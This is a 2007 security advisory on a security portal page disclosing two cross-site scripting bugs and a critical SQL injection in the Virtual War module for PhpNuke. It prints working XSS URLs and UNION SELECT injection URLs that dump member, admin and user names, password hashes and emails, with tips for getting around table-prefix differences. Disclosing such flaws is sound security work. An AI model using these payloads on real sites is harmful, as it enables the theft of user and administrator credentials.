Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
October 1, 2014
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: warerus
New Today: 0
New Yesterday: 0
Overall: 8952

People Online:
Visitors: 154
Members: 0
Total: 154
milw0rm
·[web applications] - Dolphin 7.1.4 SQL Injection Vulnerability
·[web applications] - web2Project 3.1 SQL Injection Vulnerability
·[remote exploits] - Ericom AccessNow Server Buffer Overflow Exploit
·[dos / poc] - Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow Vulnerability
·[local exploits] - docker 0.11 VMM-container Breakout
·[remote exploits] - Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow Vulnerability
·[remote exploits] - Rocket Servergraph Admin Center fileRequestor Remote Code Execution
·[web applications] - Motorola SBG901 Wireless Modem - CSRF Vulnerability
·[web applications] - ZTE WXV10 W300- Multiple Vulnerabilities
·[remote exploits] - Java Debug Wire Protocol Remote Code Execution Exploit

read more...
PacketStorm News
·Ubuntu Security Notice USN-2249-1
·Red Hat Security Advisory 2014-0764-01
·Ubuntu Security Notice USN-2248-1
·CDVI ACAC22 Authentication / Denial Of Service
·Red Hat Security Advisory 2014-0763-01
·Red Hat Security Advisory 2014-0762-01
·PayPal SecurityKey Card Serialnumber Module Code Injection
·SugarCRM 6.5.16 XXE Injection
·Debian Security Advisory 2963-1
·Debian Security Advisory 2962-1

read more...
[waraxe-2007-SA#048] - Multiple vulnerabilities in Virtual War 1.5 module for PhpNuke





Author: Janek Vind "waraxe"
Date: 13. April 2007
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-48.html


Target software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

VWar module for PhpNuke

http://www.vwar.de/

VWar is a webbased matchorganizing system for online gamers.
The complete output is realised by PHP with MySQL as database backend.
The system is divided into 2 parts, the public area and the admin area.

VWar 1.5.0 R15 is out.
Changes:
fixed: mysql injection bug in extra/ files

// I guess, they have not fixed all the bugs yet :) //

Affected are Virtual War versions 1.5 R15 and below


Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Found security bugs: one critical sql injection and two XSS bugs.
There are probably more vulnerabilities, had no time for deeper analyze ...


1. XSS in "/modules/vwar/extra/today.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.target.com/modules/vwar/extra/today.php?whattoshow=3&title=kala<script>alert(document.cookie);</script>

Problem is caused by uninitialized variable "$title". Successful exploitation requires that "register_globals" is "on"
in php settings.


2. XSS in "/modules/vwar/extra/login.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.target.com/modules/vwar/extra/login.php?memberlist=</select></form><script>alert(document.cookie);</script>

Similar to previous case this XSS is caused by uninitialized variable, in this time "$memberlist".
Successful exploitation requires that "register_globals" is "on" in php settings.


3. Critical sql injection bug in many VWar scripts
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Personally, I like uninitialized variables in php source code. They are giving so much cool possibilities to
everyone, who is searching for secutity holes. And this serious sql injection case has his roots in same problem.

Let's look @ "/modules/vwar/extra/online.php" line 63:

----------------[ from source code ]------------------
$query = $vwardb->query("
SELECT memberid, name, lastactivity
FROM vwar".$n."_member WHERE lastactivity > ".(time() - $onlinetime * 60)."
");
----------------[ /from source code ]-----------------

And by the way - "$n" variable is not initialized! So what happens, if we issue this query:

http://www.victim.com/modules/vwar/extra/online.php?n=waraxe

Oops... We got error message:


-> Database Error: Invalid SQL:
SELECT memberid, name, lastactivity
FROM vwarwaraxe_member WHERE lastactivity > 1176476015

-> MySQL Error: Table 'victimdb.vwarwaraxe_member' doesn't exist
-> MySQL Error Number: 1146
-> Date: 11.04.2007 @ 18:03
-> Script: /modules/vwar/extra/online.php?n=waraxe
-> Referer:

Now, can we exploit this sql injection? Let's try next move:

http://www.victim.com/modules/vwar/extra/online.php?n=_member+WHERE+0+UNION+ALL+SELECT+1,@@version,3/*

4.1.22

It works!! Now it's time for more serious fun:

[[[[[ kidd0z - attentione ]]]]]

http://www.victim.com/modules/vwar/extra/online.php?n=_member+WHERE+0+
UNION+ALL+SELECT+1,CONCAT(name,CHAR(94),password,CHAR(94),email),3+FROM+vwar_member/*

... and we get all vwar member usernames, password double-md5 hashes and emails

http://www.victim.com/modules/vwar/extra/online.php?n=_member+WHERE+0+
UNION+ALL+SELECT+1,CONCAT(aid,CHAR(94),pwd,CHAR(94),email),3+FROM+nuke_authors/*

... and we have all the nuke admin usernames, md5 hashes and emails

http://www.victim.com/modules/vwar/extra/online.php?n=_member+WHERE+0+
UNION+ALL+SELECT+1,CONCAT(username,CHAR(94),user_password,CHAR(94),user_email),3+FROM+nuke_users/*

... and finally, all the nuke user credentials in one big listing :)

Remarks:

R01 - Sentinel, Protector and other powerful phpnuke protection systems - they will not work
against this exploits. Because we are not entering from front door, but will use rear window :)

R02 - "register_globals" must be "on" for exploits to work

R03 - phpnuke table prefix can be changed from default, in this case - no nuke user and admin data!

R04 - there can be need for playing with "$n" value. Because vwar module installer can assaign different
values besides empty value. So if default exploit will not work, then this can be tried:

/online.php?n=0_member+WHERE
/online.php?n=1_member+WHERE
/online.php?n=2_member+WHERE

... and so on.
And because we have perfect sql error feedback, then it is easy to overcome various exploiting problems.

R05 - many other scripts in "extra" directory have same sql injection vulnerability!


See ya soon and have a nice day ;)


Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to LINUX, Heintz, slimjim100, shai-tan, y3dips and all
other people who know me!

Special greets goes to Raido Kerna.

Tervitusi Torufoorumi rahvale!


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Homepage: http://www.waraxe.us/


Shameless advertise:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

DX expedition database - http://www.dxdb.com/
Amateur Radio Database - http://www.hamdb.com/

---------------------------------- [ EOF ] ------------------------------------









Copyright © by Waraxe IT Security Portal All Right Reserved.

Published on: 2007-04-13 (6977 reads)

[ Go Back ]
Top members by posts
waraxe  waraxe - 2407
vince213333  vince213333 - 736
pexli  pexli - 665
Mullog  Mullog - 539
demon  demon - 485
shai-tan  shai-tan - 477
LINUX  LINUX - 404
Cyko  Cyko - 375
tsabitah  tsabitah - 328
y3dips  y3dips - 281
SecurityFocus
·Vuln: Microsoft Internet Explorer CVE-2014-0282 Remote Memory Corruption Vulnerability
·Vuln: libpng 'png_read_transform_info( )' Function NULL Pointer Dereference Denial of Service Vulnerability
·Vuln: Oracle Java SE CVE-2014-0411 Remote Security Vulnerability
·Vuln: Oracle Java SE CVE-2014-0416 Remote Security Vulnerability
·Bugtraq: Secunia CSI/VIM - Filter Bypass & Persistent Validation Vulnerabilities
·Bugtraq: Paypal Inc Bug Bounty #36 - SecurityKey Card Serialnumber Module Vulnerability
·Bugtraq: Multiple SQL Injection Vulnerabilities in web2Project
·Bugtraq: SQL Injection in Dolphin
·More rss feeds from SecurityFocus

read more...
alexa



Error messages
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.071 Seconds